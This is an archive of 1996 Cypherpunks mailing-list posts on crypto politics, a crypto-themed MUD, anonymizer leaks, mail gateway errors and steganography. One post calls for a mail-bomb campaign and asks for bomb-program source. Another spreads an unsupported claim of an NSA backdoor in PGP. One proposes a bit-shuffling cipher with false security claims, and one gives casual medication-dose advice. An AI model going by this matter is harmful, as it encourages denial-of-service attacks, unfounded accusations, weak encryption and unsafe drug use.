yourself if your friendly neighboorhood politician fits this 
definition.

My famnily owned a land.  The city expropriated us at around 
1.85$/sq.ft. while they evaluated, "for taxation purposes", the land 
at 4.85$/sq.ft.  They sold the land to a local "silicon-valley-style" 
project who went bankrupt so the city could repossess it.  We fighted 
the provincial govt (and won partially) because they planned to have 
the capacity to re-sell the land for housing projects, therefore 
speculating on expropriated land.  Hey, I'd rather have the 10$ it is 
worth that let them have them.  We damn worked this land for 50 years.

And all of this was done in the name of "for the good of science",
technology and high-tech employement, all with the full moral
sanction of our universities most famous universities, provincial, 
federal and municipal govt.  Only, there is not a damn business that 
came to establish itself there.  Finally, one big pharmaceutical did 
but there is probably a lot of corruption underneath.  It stinks.

The way they could perform that extortion was with the aid of 
hundreds of half baked semi truths and fallacies, all in the name of 
some "unknown but all desserving" fucking "public".  If we would have 
simply stood up and named their fallacies in the first place, they 
would have had a much harder time doing what they did to us.  but our 
modern lawyers and "counsellors" said that we should "play along".  

Since the land had 9 co-owners, FUD worked well and most owners were
convinced to play the game, therefore granting them the moral
sanction of acknowledging realism and legitimacy.  It was *all* done
in the name of "tolerance" and of being "open minded".  But as I
said, a little poison is still poison.  In retrospect, by granting
them the semblance of reason, *WE* forged reality for them, *WE* gave
them a moral sanction.  I am not one of the owner.  My mom's family
is.  I watched the scene with rage but I couldn't do anything. Try
to make theses peoples understand after being told for all their
life that "being polite" and "being tolerant" is a must...

There is no such thing as being tolerant to being killed.  You don't 
just "die only a little".  In the same way, you don't loose "only a 
little" taxed dollars or free speech.

I am not a Randian, but I agree with many ideas of Ayn Rand.  I don't 
recite half-memorized paragraph out of her books, I fought and still 
fight as I can the govt in their looting schemes.  I was there, 
sitting with ministers and arguing with them.  I saw the leeches in 
action.  

So, if you persist at advocating politeness in thoses situations,
next time a mugger try to beat you, try to remain polite in the first 
time... 

Many friends of many politicians will get rich on it.  Our layers
will get rich on it.  We worked the damn place for 50 years and
*owned* it.  Land, not that far from there was sold at around 16$. 
Land behind ours was sold 7$.  We got 1.85$.

If anybody wants to argue with me, first send a check for the
difference between 10$ and 1.85$, times the sq.ft. surface of the
land. (e-mail me by PGP to have the figures :)  Then, we could
*start* discussing the virtues of statism.

Regards.

JFA
Who is John Galt?  :)
 DePompadour, Societe d'Importation Ltee; Limoges porcelain, silverware and crystal
 JFA Technologies, R&D consultants: physicists, technologists and engineers.

 PGP keys at: http://w3.citenet.net/users/jf_avon
 ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 31 Aug 1996 06:18:31 +0800
To: cypherpunks@toad.com
Subject: Re: MUD anyone?
Message-ID: <ae4c85ab040210040813@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:27 PM 8/30/96, Jon Leonard wrote:
>Tim May wrote:
>> I second many of the comments about the difficulties in coding a reasonably
>> plausible game or MUD for exploring list ideas.
>
>["Crypto Anarchy Game." value and difficulties stuff snipped]
>
>> Coding nearly any of the core cryptographic concepts for use in an online
>> game, even without a real crypto core (e.g., using other trust mechanisms)
>> is likely to be almost as big a job as actually coding the concepts for
>> real-world use. Could be very educational, and a useful dry run for later
>> real-world reification of concepts, but by no means easy.
>
>I don't think it's quite that hard, so I tried to implement asymetric key
>cryptography:
>
>20 minutes, to write and debug:

Well, cryptography (per se) is the most basic, and in some sense simplest,
part of the whole thing: the "semantics" of crypto are well-understood
(even if not to the snake oil salesmen and repeated inventors of one time
pads).

Consider that PGP was basically a realization (others existed, natch) of
ideas that were almost 20 years old.

Some much harder (to me) protocols: fair coin tosses, blinded coins,
oblivious transfers, digital cash in all its many forms (and issues),
DC-Nets, and so on. Sure, bits and pieces are codable--and have been--but a
comprehensive package is tough to write. Wei Dai's and Matt Blaze's
libraries are excellent, I hear, but are not targetted at creating these
building blocks for crypto anarchy.

And the social and organization assumptions coded into software is a major
issue to think about. Some Scheme or C code doing part of these things will
likely not be real useful.

Your code is admirable. I did the same thing in Mathematica, a few years
ago when I was still interested in the innards of RSA. (It took me longer
than 20 minutes to write, though...but I also got to play around with big
primes, the basic number theory stuff, etc. A useful learning experience.)

But implementing more recent cryptographic building blocks seems more than
an order of magnitude harder. (If you can implement a reasonably robust
bank-digicash system in 10 x 20 minutes = 3.5 hours, I'll be impressed.
Merely speccing what it should do and how it should behave in various
situations would take far, far longer than this. Just my view. Maybe I'm
wrong.)



>It is a big project, but the big part is writing the MUD, not adding the
>crypto-anarchy stuff to it.  I'm writing a MUD anyway, and have been off
>and on for over a year.  Mark Grant's message made me think about what it
>would take to add the features I wasn't already planning on.

Depends on what you mean by "crypto-anarchy stuff." As I see it, it means
building a reasonably robust economic system, a market or agora with
various transaction mechanisms built in. Sort of a cross between "SimCity"
and Vinge's "True Names."

>I'm still interested in ideas as to what primitives I should fake.
>
>> And as Jim Bell noted, there are all sorts of costs which are not properly
>> accounted for. I would not, for example, expect anything interesting to
>> emerge out of the simulation of "assassination politics" in such a game, as
>> the costs, dangers, moral issues, and whatnot are not properly
>> accounted-for in such a MUD-type simulation. (No more so than in a fantasy
>> role-playing game, where characters die routinely...)
>
>After I think about it more, I realize that a MUD simulation can't show
>that something like "assassination politics" wouldn't work.  At best it
>can show that it does or doesn't work in that particular environment,
>leaving open the question of what key difference between MUD and reality
>might change the result.  Still, it would be interesting to see how it
>worked, or why it didn't.

Even if well-implemented (a _lot_ of effort), I doubt it would say anything
more about the real-world aspects of some future crypto-anarchic world
than, say, playing "Risk" or "Diplomacy" has meaningful things to say about
how nations form alliances and go to war with other nations. Or as much as
playing "Monopoly" teaches one about actual business and economic
interactions.

(Before defenders of these games jump in with comments about how useful and
enjoyable these games are, sure, some knowledge is gained. But huge
differences are obvious. A conclusion drawn from playing these games will
not hold up in the real world. I expect the same is true of "assassination
politics.")

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Charley Sparks <sparks@bah.com>
Date: Fri, 30 Aug 1996 20:51:09 +0800
To: tcmay@got.net
Subject: Re: Nuke Singapore Back into the Stone Age
Message-ID: <199608300938.FAA08698@booz.bah.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

To: tcmay@got.net, cypherpunks@toad.com
Date: Fri Aug 30 05:45:44 1996
We could launch a mail-bomb campaign.. I am looking for the source for a mail bomb 
program. WinTel would be nice but I could use Linux
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCXAwUBMia4SeJ+JZd/Y4yVAQGlpgQMCuPtwANs1N4JbQDyUsNEpib2rR2CNrsY
lRIQ1gVNHNZhptnDaHxu69R0dLhBF/hjbnQwhINGYZcuCVfE7kxRdgwVVmU+G7Bw
ods0qCVe2CFddD0cxxQ8mdURnnTQGkN2nz4wA2zx1DHN/pKqzrCYxlLLllzGb+MH
50BM7K2Wj6BShQ==
=wB2W
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Charley Sparks <sparks@bah.com>
Date: Fri, 30 Aug 1996 20:58:52 +0800
To: alanh@infi.net
Subject: Re: see you guys later
Message-ID: <199608300942.FAA08865@booz.bah.com>
MIME-Version: 1.0
Content-Type: text/plain


You might want to reconsider the 2x Lithium.... too much really does make you feel 
like shit ! Actually the lobotimizing effects of stellazine (sp) aren't too bad for 
a short time




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: NetSurfer <netsurf@pixi.com>
Date: Sat, 31 Aug 1996 03:08:17 +0800
To: cypherpunks@toad.com
Subject: Re: www.anonymizer.com
In-Reply-To: <199608292255.PAA08976@netcom7.netcom.com>
Message-ID: <Pine.SV4.3.91.960830060820.3076F-100000@netsurfer>
MIME-Version: 1.0
Content-Type: text/plain



I have found and reported to the anonymizer that it does not 
always protect you against perl-based cgi scripts.  I did this by 
accessing a form-based email page (based on Matt's script) which includes 
environment variable values in the msg to the recipient.  I didn't 
receive any response back from them after I emailed them the info.

On Thu, 29 Aug 1996, Bill Frantz wrote:

> www.anonymizer.com got a nice plug in David Plotnikoff's column in today's
> San Jose Mercury News.  He quotes Community ConneXion's motto, "Because on
> today's Internet, people do know you're a dog."  He also mentions its
> similarity to anonymous remailers.  His capsule review:
> 

#include <standard.disclaimer>
                    _   __     __  _____            ____
                   / | / /__  / /_/ ___/__  _______/ __/__  _____
                  /  |/ / _ \/ __/\__ \/ / / / ___/ /_/ _ \/ ___/
                 / /|  /  __/ /_ ___/ / /_/ / /  / __/  __/ /
================/_/=|_/\___/\__//____/\__,_/_/==/_/==\___/_/===============






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Fri, 30 Aug 1996 17:33:05 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: Selling your sole to DOJ ...err, devil   Zimmermann?
Message-ID: <199608300621.AAA29460@InfoWest.COM>
MIME-Version: 1.0
Content-Type: text/plain


= This is a bit much, if not off the wall. Any glimmer of
= truth..?  
= 
        [snip]  
=   
= A lot of people think that PGP encryption is unbreakable and that the  
= NSA/FBI/CIA/MJ12 cannot read their mail. This is wrong, 
=
        [snip]
= Since version 2.1, PGP ("Pretty Good Privacy") has been rigged
= to allow the NSA to easily break encoded messages. Early in
= 1992, the author, Paul Zimmerman, was arrested by Government
= agents. He was told that he would be set up for trafficking
= narcotics unless he complied. The Government agency's demands
= were simple: He was to put a virtually undetectable trapdoor,
= designed by the NSA, into all future releases of PGP, and to
= tell no-one. 

        well, as to the methodology of threatening (and 
    actually prosecuting) narcotics complicity or conspiracy
    under Title 18 861(a), I can vouch for the method...   all
    "they" need is a judge like Peck in El Paso (assassinated on
    the bench) or Foley in Vegas (retired and gone --a hero)
    --both were better known as "Judge Ray Bean, law west of the
    Pecos"  and just about as knowledgeable and reliable....

        First, let me state: this is not a frontal attack on 
    Zimmermann himself, but a question given some of the 
    historical precedents and circumstances, and their 
    implications on the basis of human behavior 

            --particularly the act of saving one's ass.
        
        Zimmermann is a political flake, a warmed over 60s
    liberal. 

        I would find it difficult, despite his apparent altruism
    and left-over 60s need for redress, to believe that
    Zimmermann's coding of PGP was other than a commercial
    stepping stone (judging from both his prior and later 
    actions); and,

        Zimmermann is nothing but the true liberal he always 
    was --most of the 60s liberals were against the government
    for one thing only: Vietnam --a morality issue as they saw 
    it --but they are *still* liberals with liberal morality and 
    a 'government solves all' outlook on life.

        I won't go into chain of command and discipline, but I 
    consider my service to have been *wasted* by a government 
    interested more in a weapons testing playground far more than 
    any ideology or righteous need of the free world (but we sure 
    used the ordinance; after all, the difference between men 
    and boys is the price of their toys!).

        --but the 60s liberal was inflamed by a sense of 
    (im)morality.
    
        therefore, we are back to the same old question: does the
    leopard ever really change his spots?  have you ever seen a
    liberal who would not sell his soul to the devil?  

        I do not wish to blow a conservative horn, but given:

                "the ax and the firing squad are merely stones 
            on the road to freedom."
                    --attila

    the sacrificial lamb is certainly not your average
    warmed-over 60s liberal who is generally no better than the
    Stalinist "socialist" sympathizers which dominated both the
    State Department and the White House during FDR's reign, as 
    their cadres gave the Manhattan project and Eastern Europe to
    Old Joe.   

        FDR's fiasco was also the first perfect example of
    OSI/NSA not willing to prosecute since they were cracking
    Russian crypto.  For instance, I always WANTED to believe 
    Alger Hiss was innocent in so much as his son, Tony, was a 
    classmate at Harvard and we were on the editorial board of 
    the Harvard Crimson at the same time  --but he certainly
    wasn't innocent with the recent release of 50 year old NSA 
    files.

        therefore, I would not even hesitate to say in relation 
    to the accusations against Zimmermann: QUITE POSSIBLE; and I 
    would certainly expect our sleazy government to make the 
    offer.

        I am not interested in sitting in judgement of Phil 
    Zimmermann --let his conscience be his judge. 

        however:

        ***  WE WOULD BE FOOLS NOT TO EXAMINE WITH A FINE ***
        ***  TOOTH COMB PGP's IMPLEMENTATION OF THE RSA   ***
        ***  ALGORITHMS                                   ***

        secondly, there is nothing to prevent us, as a group, 
    from building a universal RSA application with a portable GUI
    (I think we can all afford Zinc (yuk...  but it covers the
    platforms cheaply --and this is not an exotic interface 
    requirement), and we can leave open hooks and interfaces for 
    mail, streaming, and every other purpose with a single 
    structure call.

            ANYONE WISH TO VOLUNTEER?  --for both problems.

        and, if no-one else has the guts to post the new PGP key 
    server compliant system software as freeware source code, I
    do!  "Their" only solution for me is murder, which is
    certainly not below their dignity; but I am old enough not to
    care.

        NOW, given that Zimmermann was supposedly insolvent at 
    the time of the "their" investigation, where did the money
    come for PGP, Inc. and where did the money come for the
    acquisition of ViaCrypt (the commercial licensee)?  

        Zimmermann was NOT funded prior to the acquisition and 
    PGP, Inc. was announced virtually the same day the DOJ 
    dropped the case.  

        not intending to slander Phil, but these are types of
    prosecution deals our "government of whores" (O'Rourke) is 
    famous for proposing  --in other words: the premise is
    open for interpretation.

        I've always believed it is not only to be clean, but to 
    appear clean in that there is no reason for suspicion of 
    anything but clean...   does Zimmermann make the test?

        HOWEVER, I do think the RSA algorithm (for instance,
    the freebie RSA routines used in mixmaster) and its
    associated code are safe to a given bit level which 
    theoretically can be incremented indefinitely as hardware
    performance advances accordingly. 

        --I seriously question "they" can break the algorithm
    itself except by brute force. The question is how far up the
    bitstream are "they?"  

        and, we should never be so complacent as to presume
    "they" will not land on an algorithmic method to create the
    primes from the bit stream --after all, they have two of the 
    four numbers and the products...

        just playing a hypothetical game on "their" fears,
    "their" pronoucements, "their" tolerance of low number
    bit encryption, and NSAs use of hardware at least a
    generation ahead, I would gamble NSA's brute force methods
    can probably break 1024 bits currently, and in a "reasonable"
    time.

        NSA is a game --they will grant the public 64 bits based
    on their estimate of the time required with a given level of
    hardware to break EVERY message in a finite number of
    sub-seconds --leaving the heavy hardware for the good
    stuff,

        at this point Thomas Scheling's theories come into play
    --I took Scheling's first course in "Game Theory" at Harvard
    in '60 --he was extremely ignorant on number theory and
    related statistical analysis --we called the course: "War
    Games."

        secondly, NSA, and the rest of "them," will play the game 
    of appeasement, fighting the good guys with delaying tactics
    as they surrender 64, then 128, then 256, etc. --talk, talk,
    talk...  and Nero is still fiddling...

        meanwhile NSA's capability to crack the good stuff is
    increasing rapidly enough to keep up with the directive that
    they must be able to decode EVERYTHING.  

        there are routines to eliminate brute force as a means of
    decryption, but they are painful and cumbersome in a public 
    key system.   plus, publication will bring the morning after
    visit from two or more spooks in raincoats...   who are not
    your friends.

        the game of appeasement depends on enough people WANTING
    (not necessarily willing) to believe that what they hear from
    big brother is the truth, or maybe better expressed as that
    old "Faith in America, land of our fathers" routine.

        anyone around here with insufficient cynicism to buy into
    NWO appeasement?

                attila,   29 Aug 96


--
Now, with a black jack mule you wish to harness, you walk up,
look him in the eye, and hit him with a 2X4 over the left eye.  
If he blinks, hit him over the right eye! He'll cooperate 
    --so will politicians.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: droelke@rdxsunhost.aud.alcatel.com (Daniel R. Oelke)
Date: Sat, 31 Aug 1996 00:03:11 +0800
To: cypherpunks@toad.com
Subject: Re: Errors-To: for cypherpunks
Message-ID: <9608301245.AA05091@spirit.aud.alcatel.com>
MIME-Version: 1.0
Content-Type: text/plain



> Hi,
>
> Whoever is in charge of maintaining this mailnig list, PLEASE
> add header
>
> Errors-To: cypherpunks-errors@toad.com
>
> I am flooded by stupid "Mailbox is full" messages from Banyan and
> CC-mail gateways.
>
>       - Igor.
>
 
While an Errors-To: field can't hurt, it shouldn't be
needed.  The problem is *broken* gateways.  There are
plenty of properly set up and running Banyan and CC-mail
gateways, we just need to harass the admins into
running the broken ones properly.
 
Let me quote from "scripture" (RFC-822) below in a typical message
I send to such idiots.  This particular person had neither
the use Sender: set up correctly, or a postmaster address.
<sigh>
 
----- included message ----
 
Your SMTP to Banyan gateway is broken and missing a postmaster address.
 
I sent a message to cypherpunks@toad.com, to which someone
at your site is apparently subscribed.  The listserver at toad.com
correctly puts a "Sender:" field in the header of all outgoing
messages, and according to RFC-822 all SMTP handleing agents
must send any bounces to that address.
 
RFC-822 specifically states (starting at line #1430 in rfc-822.txt)
 
     4.4.4.  AUTOMATIC USE OF FROM / SENDER / REPLY-TO
 
        For systems which automatically  generate  address  lists  for
        replies to messages, the following recommendations are made:
 
            o   The "Sender" field mailbox should be sent  notices  of
                any  problems in transport or delivery of the original
                messages.  If there is no  "Sender"  field,  then  the
                "From" field mailbox should be used.
 
Also, RFC-822 states that you must have an address of postmaster
that people can send email to  (starting at line #2046 in rfc-822.txt)
 
 
     6.3.  RESERVED ADDRESS
 
          It often is necessary to send mail to a site, without  know-
     ing  any  of its valid addresses.  For example, there may be mail
     system dysfunctions, or a user may wish to find  out  a  person's
     correct address, at that site.

          This standard specifies a single, reserved  mailbox  address
     (local-part)  which  is  to  be valid at each site.  Mail sent to
     that address is to be routed to  a  person  responsible  for  the
     site's mail system or to a person with responsibility for general
     site operation.  The name of the reserved local-part address is:
 
                                Postmaster
 
     so that "Postmaster@domain" is required to be valid.
 
     Note:  This reserved local-part must be  matched  without  sensi-
            tivity to alphabetic case, so that "POSTMASTER", "postmas-
            ter", and even "poStmASteR" is to be accepted.
 
 
So, please fix your gateway, or contact Banyan on how to
correctly configure it.
 
Thank-you,
 
----- end included message ----
 
------------------------------------------------------------------
Dan Oelke                                  Alcatel Network Systems
droelke@aud.alcatel.com                             Richardson, TX





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Sat, 31 Aug 1996 02:02:15 +0800
To: dthorn@gte.net (Dale Thorn)
Subject: Re: Encryption
In-Reply-To: <3226ADC6.6C87@gte.net>
Message-ID: <199608301351.IAA09141@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Khm, am I being trolled?

The purpose of encryption is to make decryption easy for designated
parties and hard for all others. The proposed algorithm simply destroys
the original text that you had. How you plan to decrypt your encrypted
messages?

It is not an encryption method, it is "data destruction" method.

igor

Dale Thorn wrote:
> 
> This is a multi-part message in MIME format.
> 
> --------------5E91F122B2E
> Content-Type: text/plain; charset=us-ascii
> Content-Transfer-Encoding: 7bit
> 
> It appears to me that PGP encryption et al is really 1940's technology, 
> albeit fancied up by 1990's computers.  Why use keys and cyphers when 
> all you should have to do is maximize the randomization of bits in a 
> script?  Big computers should not be able to de-randomize such encoding, 
> since the permutations/combinations would be astronomical after just a 
> half-dozen or so random number initializations, as well as the fact that 
> the bits are relatively undifferentiated (just ones and zeros) and are 
> not maintained with their original bytes, words, paragraphs, or pages?
> 
> --------------5E91F122B2E
> Content-Type: text/plain; charset=us-ascii
> Content-Transfer-Encoding: 7bit
> Content-Disposition: inline; filename="readme.1st"
> 
> DALE THORN ON CRYPTOGRAPHY: ABSTRACT                            23 August 1996
> ------------------------------------------------------------------------------
> 
> Algorithm: Select bit-groups of random length from the file until the file is
>            completely processed.  Shuffle the bits in each group randomly and
>            save each group back to the file. Repeat if needed using different
>            key-strings for each successive encryption, for increased security.
> 
> "If a high-speed computer could perform 'a trillion processor ops per second',
> and it took just one millionth of a second to 'crack' my test file on such a
> machine (i.e., a million ops), it would still require 10^36 ops to 'crack' 6
> consecutive encodings, which translates to 10^24 seconds, or 3 x 10^16 years."
> 
> "Due to the nature of compounded bit-shuffling, no algorithm ever developed
> or proposed could 'crack' multi-pass encoding with a single decryption pass.
> In plain English, if a file were encoded six times (in six passes, with six
> different password phrases), you'd have to decode all six passes before you
> would know whether even the first decryption pass was successful or not."
> 
> "Since each byte in the encrypted file may contain bits from other 'original'
> bytes, multi-pass encoding moves you rapidly in the direction of true-random
> distribution of the source bits (note the 'Intelligent User' comment below)."
> 
> "My desktop computer (a 90 mhz Pentium) can encrypt a 12 kb file in less than
> one second (in a single pass) using 'C', and takes less than two seconds with
> the PDQ version of Basic I use, hence, the six passes that I normally perform
> on such a file require nine seconds or less total computer time."
> 
> "One of the difficulties in breaking this type of encryption (other than the
> numerical time factors) is the fact that you might have to deal with several
> unknown random number generators from different compiled executable programs.
> Add to this another factor, the 'Intelligent User' who adds their own tweaks
> to the source code. The tweak is added, the program is compiled, the file(s)
> are encrypted, and then the modified source code is destroyed along with the
> executable file.  This type of modification, together with the fact that the
> individual bits in the encrypted text file are scattered very effectively in
> normal encoding, yields the ultimate level of security for concerned persons."
> 
> ------------------------------------------------------------------------------
> A SIMPLIFIED EXAMPLE FOR ENCRYPTION/DECRYPTION
> ------------------------------------------------------------------------------
> 
> We're going to encrypt the following 25-character text string:
> 
>    when_it_rains_it's_a_bath
> 
> The unencrypted string (in bit form, least significant bit at left) is:
> 
>    11101110000101101010011001110110111110101001011000
>    10111011111010010011101000011010010110011101101100
>    11101111101010010110001011101110010011001110111110
>    10100001101111101001000110100001100010111000010110
> 
> We now generate 200 random numbers, and sort them in ascending order.
> The following list represents the original physical positions of the
> numbers, and we move the bits as shown above from these positions in
> the 25-byte text string to bit positions 0, 1, 2, etc. (move bit #4
> to the first position, move bit #179 to the second position, etc.).
> 
>      4 179  67 127  46  76 136  74  92  54
>     88 121 134 192  77  36  47  26  45 144
>    111 141 150  58 110  12  94  13 161 177
>     18 155 153 175  91  95  86 195  79  20
>     23 172  51  96 126  93  64   3 125  81
>    166 131  71  63 170  78 140  87 107 147
>     15  35  10 168  33 149 189 118  42  90
>      6  85 120  68 102 173 103 104 138  83
>     53  43 182 139  29  60 146 184 176 114
>    123  44 191  56  70 185  73 137 148 199
>    196  27  65  62  37 181  28   0 106 158
>    100   1 190   2  25 194   8  30 174 101
>    105 135 162  61  75  32 115 142  14  49
>    186  50 183  21 119  52  69  99  11  89
>     72  34  98 188  82  17 163   9 167 109
>    113 171  38 157  84   5  59 178  22  57
>    151 122 160 130  39 116 133 156 164  66
>    159  40 124 193 108 180 152  41  97   7
>    197 145 132 169  55  16  24 165 198 112
>     19 129 187  31 154  48  80 128 117 143
> 
> The text string (in bit form) following the first encryption is now:
> 
>    10001010010000110111011110111010001011000001110010
>    10000110110100101101110111010111101110100001100110
>    01110101111111100111101001111011010110111101001000
>    00110110110111001010011010101011010100110100001110
> 
> At this point, it's obvious (with a sufficient length of text to analyze) that
> we could restore the original text using an algorithm equivalent to the pseudo-
> random number generator we used above.  However, we're going to encrypt again:
> 
> Generate another 200 random numbers and sort them in ascending order.
> The following list represents the original physical positions of the
> numbers, so move the bits the same way we moved them above (move bit
> #41 to the first position, move bit #9 to the second position, etc.).
> 
>     41   9  38  86  67 108   8  99 157  69
>     91   6  15 150  28 192  56  98  54  72
>    145  19  48  64 183 147 102   7 138 177
>    167  29 164 176  97  82  83 168 181  95
>    185  22  21  30  93 182 109  39 197  14
>     96  40  84 137 155 143  16 126  58  33
>    149 144 140 159  88 189   4 190 153  90
>     68 114 129  45  53 112 119 125 127 124
>     20 141 142  77 188 115 175 105  60 194
>    106  80  31  49  51 116   1 113 151  94
>      2 199 161 146  71 101  62  66 154 166
>      3 128   5 118  10  61 110 165  43 122
>     42  47 184  46 133  85  74 173  36  44
>    111 171  89  35 163 136 162 198  17  23
>     78 152 121  37  12 186  55 169 103  24
>     34  26 178  87  81 123 132 195  65  11
>    174 191 193 172  18  25 196 107 120 187
>     27 100 180 134  59 135 179  57 148   0
>     63  13 158 130  70 131 117 139  32 104
>     92 170  50  76  73  79  75 160  52 156
> 
> The text string (in bit form) following the second encryption is now:
> 
>    01011100010110101100011110101000011101101111101011
>    00101101100011111010010101111001011001000100000101
>    00111101010101011011000011101111001111110101001011
>    11101000001101101110101011000100111111000010111001
> 
> Now that we've doubly-encrypted the text string, try to describe an algorithm
> that will restore the original string in a single decryption step, i.e., move
> directly from the last-encoded text to the original text without the need for
> an intermediate decryption step.
> 
> Text parsers and lexical analyzers won't do you any good in intermediate steps
> as described above, since all intermediate encodings will be garbage text (not
> only will the bits in each character be scrambled, but bits will be scrambled
> across characters, words, and paragraphs as well.
> 
> Multi-step decryption could be facilitated where text can be analyzed a few
> characters or words at a time, assuming the analysis engine could determine
> from where to get the appropriate bits when processing a large text stream.
> 
> In the above examples of bit-level encryption, the individual bits migrate to
> various places in the text string rather than remain within each set of eight
> bits which DOS arbitrarily designates as character bytes. Therefore, the ONLY
> tenable (but not necessarily viable) methods for decoding such text are:
> 
>    1. Try rearranging the bits randomly.  The disadvantages are:
> 
>       a. You could come up with "Mary had a little lamb...", etc., given
>          that the bits are minimally differentiated (just ones and zeros).
> 
>       b. Decryption would require eons of time (an exponential factor of the
>          number of bits processed, divided by the cycle time of the computer).
> 
>    2. Decrypt the text one step at a time, in the reverse order of the
>       encryption steps.  The disadvantages are:
> 
>       a. You can't be sure you've decrypted any step correctly until decryption
>          is completed (until all steps are performed and the text is readable).
> 
>       b. Passwords/phrases, algorithms, code routines, and even whole programs
>          might change from step to step, thereby invalidating any 'single-pass'
>          decryption scheme that's likely to be proposed.
> 
> --------------5E91F122B2E--
> 



	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jon Leonard" <jleonard@divcom.umop-ap.com>
Date: Sat, 31 Aug 1996 03:56:14 +0800
To: cypherpunks@toad.com
Subject: Re: MUD anyone?
In-Reply-To: <ae4b16e901021004256d@[205.199.118.202]>
Message-ID: <9608301627.AA09337@divcom.umop-ap.com>
MIME-Version: 1.0
Content-Type: text


Tim May wrote:
> I second many of the comments about the difficulties in coding a reasonably
> plausible game or MUD for exploring list ideas.

["Crypto Anarchy Game." value and difficulties stuff snipped]

> Coding nearly any of the core cryptographic concepts for use in an online
> game, even without a real crypto core (e.g., using other trust mechanisms)
> is likely to be almost as big a job as actually coding the concepts for
> real-world use. Could be very educational, and a useful dry run for later
> real-world reification of concepts, but by no means easy.

I don't think it's quite that hard, so I tried to implement asymetric key
cryptography:

20 minutes, to write and debug:

(d encrypt (l (message key)
              (l (n) (if (= key n) message))))

(d makekey (l () (d dkey ())
                 (l (n) (if (!= dkey ()) (encrypt n dkey)
                                         (set dkey n)))))

(d keypair (l () (d a (makekey)) (d b (makekey)) (a b) (b a) (list a b)))

(d keys (keypair))

(d p "Squeamish Ossifrage")
(d c ((car keys) p))
(c (cadr keys))
"Squeamish Ossifrage"
(c (car keys))
()

It relies on a few features of my MUD language, namely that functions
are opaque datatypes, and that any two calls to l (short for lambda)
return objects distinct to !=.

> I'm not trying to discourage anyone. Go for it! But it's a _big_ project.

It is a big project, but the big part is writing the MUD, not adding the
crypto-anarchy stuff to it.  I'm writing a MUD anyway, and have been off
and on for over a year.  Mark Grant's message made me think about what it
would take to add the features I wasn't already planning on.

I'm still interested in ideas as to what primitives I should fake.

> And as Jim Bell noted, there are all sorts of costs which are not properly
> accounted for. I would not, for example, expect anything interesting to
> emerge out of the simulation of "assassination politics" in such a game, as
> the costs, dangers, moral issues, and whatnot are not properly
> accounted-for in such a MUD-type simulation. (No more so than in a fantasy
> role-playing game, where characters die routinely...)

After I think about it more, I realize that a MUD simulation can't show
that something like "assassination politics" wouldn't work.  At best it
can show that it does or doesn't work in that particular environment,
leaving open the question of what key difference between MUD and reality
might change the result.  Still, it would be interesting to see how it
worked, or why it didn't.

I apologize for my earlier comment that presupposed that it would fail.

[snip]

> --Tim May

Jon Leonard




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andy Brown <a.brown@nexor.co.uk>
Date: Fri, 30 Aug 1996 18:58:00 +0800
To: "cypherpunks@toad.com>
Subject: RE: Mimic Function Stego Programs?
Message-ID: <01BB9656.479128F0@mirage.nexor.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


On 29 August 1996 21:34, Damien Lucifer[SMTP:root@HellSpawn] wrote:

> A quick example:
> 
> dictionary: 1=sofa 0=couch
> input: The couch is very comfortable
> output (0): The sofa is very comfortable.
> output (1): The couch is very comfortable.

This idea generalises well from human to computer assembly languages.
You often have a choice of which instruction to use to achieve your goal,
and a stego assembler could quite easily be constructed.


- Andy





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Remo Pini <rp@rpini.com>
Date: Fri, 30 Aug 1996 18:39:37 +0800
To: cypherpunks@toad.com
Subject: Crypto CD will be produced
Message-ID: <9608300754.AA20036@srzts100.alcatel.ch>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To: cypherpunks@toad.com
Date: Fri Aug 30 09:52:35 1996
Enough requests for the CryptoCD have been made. It will definitely be 
produced (guys out there, send me those archives!!!). For details check:

http://www.rpini.com/crypto/cryptocd.html

Thanks to all who requested the CD. 

- ------< fate favors the prepared mind >------
Remo Pini                        rp@rpini.com
PGP:  http://www.rpini.com/crypto/crypto.html
- ----< words are what reality is made of >----
-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQEVAwUBMiadxhFhy5sz+bTpAQHYAggA0Yiz/pP3CAhHx6h5K+t92bXgoadjN+Wn
nJrKwHWhEs2KOwjZqfSM+AXHw/YURqGl1+wN1SJiKpZqPpoo8cM2fPWOEYg97xSG
yAs7a6o9iCqCeOrRxKIAO8fuByOUpgCbYQg2ITkRpoE2isfyex+O4LqpdHfWR08h
TlqpAEnVU9aO9EXUYpNUzByEs/qZ3xhIL0+F8q1fcVIOn1XscgiJ5gZpkGQSnGAn
8FJAEgjHl35MEx8RDxTVa5XqF9/qI0IDQMQC7pgsvq3/hOSfdGlpvhVv5jLzP5le
